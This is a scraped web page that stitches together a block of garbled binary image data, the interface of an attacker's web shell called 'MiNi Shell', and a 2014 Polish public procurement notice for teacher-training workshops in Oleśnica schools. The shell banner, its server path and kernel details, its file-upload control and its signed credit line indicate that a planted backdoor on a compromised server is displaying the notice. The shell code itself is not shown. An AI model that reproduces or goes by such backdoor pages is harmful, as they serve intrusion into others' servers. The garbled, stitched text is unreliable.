JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140917/309746-N-2014.html

<p class="kh_header"><b>Oleśnica: Prowadzenie spotkań (wykładów, warsztatów grupowych, konsultacji grupowych i konsultacji indywidualnych) w ramach procesu wspomagania w szkołach i przedszkolach powiatu oleśnickiego oraz prowadzenie zajęć (warsztatów) w ramach  sieci współpracy i samokształcenia nauczycieli w  projekcie pn.: Innowacyjny system wspomagania oświaty w powiecie oleśnickim</b><br>
<b>Numer ogłoszenia: 309746 - 2014; data zamieszczenia: 17.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Edukacji i Kultury w Oleśnicy , ul. Wojska Polskiego 56, 56-400 Oleśnica, woj. dolnośląskie, tel. 71 314 01 72, faks 71 314 01 72.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pceik.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie spotkań (wykładów, warsztatów grupowych, konsultacji grupowych i konsultacji indywidualnych) w ramach procesu wspomagania w szkołach i przedszkolach powiatu oleśnickiego oraz prowadzenie zajęć (warsztatów) w ramach  sieci współpracy i samokształcenia nauczycieli w  projekcie pn.: Innowacyjny system wspomagania oświaty w powiecie oleśnickim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest prowadzenie spotkań (wykładów, warsztatów grupowych, konsultacji grupowych i konsultacji indywidualnych) w ramach procesu wspomagania w szkołach i przedszkolach powiatu oleśnickiego oraz prowadzenie zajęć (warsztatów)  w ramach  sieci współpracy i samokształcenia nauczycieli w  projekcie pn.: Innowacyjny system wspomagania oświaty w powiecie oleśnickim współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół. Projekt realizowany jest w ramach umowy o dofinansowanie Nr UDA-POKL.03.05. 00-00-093/13-00 z dnia 31 lipca 2014r. Celem projektu jest podniesienie jakości funkcjonowania systemu doskonalenia nauczycieli w powiecie oleśnickim poprzez zrealizowanie w okresie IX 2014 - VI 2015 r. 33 Rocznych Planów Wspomagania (RPW) w 33 szkołach i przedszkolach spójnych z ich rozwojem w obszarach wymagających szczególnego wsparcia oraz organizację sieci współpracy i samokształcenia nauczycieli i dyrektorów. 
Projekt obejmie wsparciem razem 33 instytucje tj. 4 przedszkola, 14 szkół podstawowych, 7 szkół gimnazjalnych, 8 szkół ponadgimnazjalnych oraz nauczycieli/-lek w nich uczących - ok. 750 osób. Każda z instytucji wybierze jedną ofertę doskonalenia w okresie realizacji projektu. Przewiduje się: - po 10 godz. dydaktycznych konsultacji grupowych; - po 10 godz. dydaktycznych konsultacji indywidualnych; - po 15 godz. dydaktycznych warsztatów grupowych; - po 4 godz. dydaktycznych wykładów na szkołę oraz zajęcia warsztatowe w ramach 5 sieci współpracy i samokształcenia - po 20 godzin dydaktycznych na sieć.
2.	Szacunkowa liczba realizacji form doskonalenia nauczycieli wynosi:

2.1 W ramach Rocznego Planu Wspomagania:
1) Wykłady - 132 godziny dydaktyczne
2) Warsztaty - 495 godzin dydaktycznych
3) Konsultacje grupowe - 330 godzin dydaktycznych
4) Konsultacje indywidualne - 330 godzin dydaktycznych
Łącznie - 1287 godzin dydaktycznych w ramach procesu wspomagania szkół/przedszkoli.
                  
2.2 W ramach sieci współpracy i samokształcenia:
1) zajęcia warsztatowe - 100 godzin dydaktycznych.

3.	Liczba uczestników/uczestniczek w każdej grupie, dla której prowadzona będzie określona forma doskonalenia nauczycieli, wyniesie około 20 osób.
4.	Wykonawca powinien zabezpieczyć kompleksową realizację form doskonalenia nauczycieli na najwyższym poziomie merytorycznym w:
4.1	14 ofertach:

1)	Jak pomóc uczniowi osiągnąć sukces edukacyjny?
2)	Techniki uczenia się i metody motywujące do nauki
3)	Uczeń - aktywny uczestnik procesu uczenia się 
4)	Oferta edukacyjna drogą do właściwej realizacji podstawy programowej
5)	Wspieranie pracy wychowawców klas - bezpieczna szkoła
6)	Postawy uczniowskie. Jak je kształtować?
7)	Budowa koncepcji pracy szkoły
8)	Praca z uczniem zdolnym
9)	Praca z uczniem ze specjalnymi potrzebami edukacyjnym
10)	Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet
11)	Rodzice są partnerami szkoły
12)	Nauczyciel 45+
13)	Współpraca nauczycieli w prowadzeniu procesów edukacyjnych
14)	Jak i po co prowadzić ewaluacje wewnętrzną?

4.2	5 sieciach współpracy i samokształcenia:

1)	Pozapedagogiczne obowiązki pracy dyrektora - sieć dyrektorów
2)	Doświadczenia i eksperymenty na zajęciach przedmiotów przyrodniczych
3)	Jak wspierać ucznia w uczeniu się matematyki?
4)	Organizacja pomocy psychologiczno -pedagogicznej w szkole
5)	analiza wyników sprawdzianów i egzaminów zewnętrznych w celu podnoszenia efektów kształcenia

5.	Wykonawca ponosi odpowiedzialność za merytoryczną realizację form doskonalenia nauczycieli.
6.	Obowiązki Wykonawcy:
1)	zapewnienie trenerów, szkoleniowców, wykładowców, konsultantów, ekspertów w danych dziedzinach do realizacji rocznych planów wspomagania (RPW) i spotkań sieci;
2)	przesyłanie SORE, Koordynatorom Sieci (KS), koordynatorowi merytorycznemu projektu, wersji elektronicznych materiałów szkoleniowych/wykładowych wykorzystywanych na potrzeby prowadzenia szkoleń
3)	ustalanie terminów spotkań poszczególnych form doskonalenia oraz ich szczegółowej  tematyki w porozumieniu z SORE, Koordynatorami Sieci (KS) po konsultacji z koordynatorem merytorycznym projektu
4)	zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia.
5)	organizowanie sprzętu i wszelkich pomocy dydaktycznych niezbędnych do realizacji zadania na swój koszt
6)	przekazanie uczestnikom materiałów szkoleniowych, dydaktycznych związanych z realizowanym wsparciem, w szczególności przedstawianych prezentacji i konspektów w wersji papierowej lub elektronicznej najpóźniej w dniu szkolenia. Przekazywane materiały muszą być sporządzone w sposób czytelny.
7)	Wykonawca jest zobowiązany przedłożyć program zajęć w wersji elektronicznej SORE, Koordynatorom Sieci (KS) i koordynatorowi merytorycznemu projektu na co najmniej 5 dni przed ustalonym terminem szkolenia/spotkania w celu uzgodnienia oraz przekazać materiały szkoleniowe w wersji elektronicznej najpóźniej w dniu szkolenia.
8)	Wykonawca zobowiązany będzie prowadzić odpowiednią dokumentację w postaci list obecności, sporządzić i przeprowadzić kwestionariusz badający kompetencje przed cyklem szkoleń i po szkoleniach (na wejściu i na wyjściu), dokonać analizy porównawczej - opracować wyniki kwestionariuszy, ankietę ewaluacyjną na zakończenie każdego szkolenia, program szkolenia obejmujący cele ogólne, cele szczegółowe, treści podzielone na moduły, zalecaną literaturę;
9)	Wykonawca jest zobowiązany przekazać Zamawiającemu (tzn. SORE, KS lub innej uprawnionej osobie z kadry zarządzającej) bezpośrednio po formie doskonalenia, a najpóźniej w ciągu 5 dni roboczych oryginały dokumentów, o których mowa w pkt 8.  
7.	Lista placówek objętych przedmiotem zamówienia:

OLEŚNICA	1.	Przedszkole nr 1 
	2.	Przedszkole nr 3 
	3.	Przedszkole nr 4
	4.	Przedszkole nr 6
	5.	Szkoła Podstawowa nr 2
	6.	Szkoła Podstawowa nr 4
	7.	Szkoła Podstawowa nr 6
	8.	Szkoła Podstawowa nr 7
	9.	Szkoła Podstawowa nr 8
	10.	Gimnazjum nr 1
	11.	Gimnazjum nr 2
	12.	Gimnazjum nr 3
	13.	Gimnazjum Gminy Oleśnica
	14.	I Liceum Ogólnokształcące
	15.	II Liceum  Ogólnokształcące
	16.	Zespół Szkół Ponadgimnazjalnych (Technikum)
SOKOŁOWICE	1.	Szkoła Podstawowa
BIERUTÓW	1.	Szkoła Podstawowa
	2.	Gimnazjum
	3.	Zespół Szkół Ponadgimnazjalnych (Technikum)
TWARDOGÓRA	1.	Szkoła Podstawowa nr 2
	2.	Gimnazjum
	3.	Zespół Szkół Ponadgimnazjalnych (Technikum)
DOBROSZYCE	1.	Szkoła Podstawowa
LIGOTA MAŁA	1.	Szkoła Podstawowa
BUKOWINA SYCOWSKA	1.	Szkoła Podstawowa
SMOLNA	1.	Szkoła Podstawowa
WABIENICE	1.	Szkoła Podstawowa
MIĘDZYBÓRZ	1.	Zespół Szkół Ponadgimnazjalnych (Technikum)
SYCÓW	1.	Liceum Ogólnokształcące
	2.	Zespół Szkół Ponadgimnazjalnych (Technikum)
DZIADOWA KŁODA	1.	Gimnazjum 
DOBRZEŃ	1.	Szkoła Podstawowa

CPV: 80000000-4 Usługi edukacyjne i szkoleniowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek o ile Wykonawca wykaże, że posiada uprawnienia do wykonywania działalności związanej z doskonaleniem zawodowym nauczycieli stosownie do przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 19 listopada 2009 r. w sprawie placówek doskonalenia nauczycieli (Dz. U. nr 200, poz. 1537, z późn. zm.). Publiczna placówka doskonalenia nauczycieli musi posiadać akt założycielski, o którym mowa w § 2 ust. 1 ww. Rozporządzenia. Niepubliczna placówka doskonalenia nauczycieli musi 
posiadać wpis do ewidencji prowadzonej przez samorząd województwa właściwy ze względu na siedzibę placówki doskonalenia zgodnie z § 24 ust. 1 ww. rozporządzenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli wykaże: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, realizację liczby co najmniej 1 000,00 form doskonalenia nauczycieli (wykłady, szkolenia, warsztaty, konsultacje, konferencje), potwierdzonych dowodami, że zostały wykonane należycie (referencje, ewaluacje i inne dokumenty potwierdzające należyte wykonanie).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli wykaże że dysponuje lub będzie dysponował: minimum 30 osobami posiadającymi: 
-	wykształcenie wyższe II stopnia (każda osoba),
-	doświadczenie trenerskie (szkoleniowe, tj. warsztatowe, wykładowe, konsultacyjne, edukatorskie, eksperckie) w realizacji liczby minimum 10 form doskonalenia nauczycieli, w zakresie 19 ofert o których mowa w pkt. 4 rozdz. III SIWZ lub dowolnych 19 z 24 ofert ORE (każda osoba w zakresie przynajmniej 1 oferty, cały zespół łącznie - w zakresie 19 ofert  z pkt. 4 rozdz. III SIWZ lub ORE)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz wykonanych usług - w zakresie potwierdzenia wykonania przynajmniej: realizację liczby co najmniej 1 000,00 form doskonalenia nauczycieli (wykłady, szkolenia, warsztaty, konsultacje, konferencje), w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wzór wykazu stanowi załącznik nr 4 do SIWZ. W przypadku wpisania do wykazu usług, wykonanych na rzecz Zamawiającego - PCEIK w Oleśnicy, wykonawca nie jest zobowiązany do przedkładania poświadczeń ani innych dokumentów.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - udokumentowane doświadczenie wykonawcy-liczba zrealizowanych form doskonalenia - 30</li>
<li>3 - udokumentowane zasoby kadrowe wykonawcy-liczba osób przewidzianych do wykonywania zamówienia spełniających warunki - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	Dopuszcza się zmianę osoby wskazanej w ofercie jedynie w formie pisemnej w przypadkach wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę tylko i wyłącznie za pisemną zgodą Zleceniodawcy,
b)	Zmiana miejsca świadczenia usługi w przypadku, gdy Zleceniodawca nie będzie mógł z przyczyn losowych zapewnić miejsca wykonania przedmiotu zamówienia wskazanego w umowie z przyczyn od siebie niezależnych, a jednocześnie będzie miał możliwość zapewnienia innego miejsca świadczenia usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pceik.nazwa.pl/public_html/bip/bip.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na w/w stronie internetowej oraz w siedzibie Zamawiającego, Oleśnica, ul. Wojska Polskiego 56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2014 godzina 11:30, miejsce: w siedzibie Zamawiającego, Oleśnica, ul. Wojska Polskiego 56 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Innowacyjny system wspomagania oświaty w powiecie oleśnickim współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com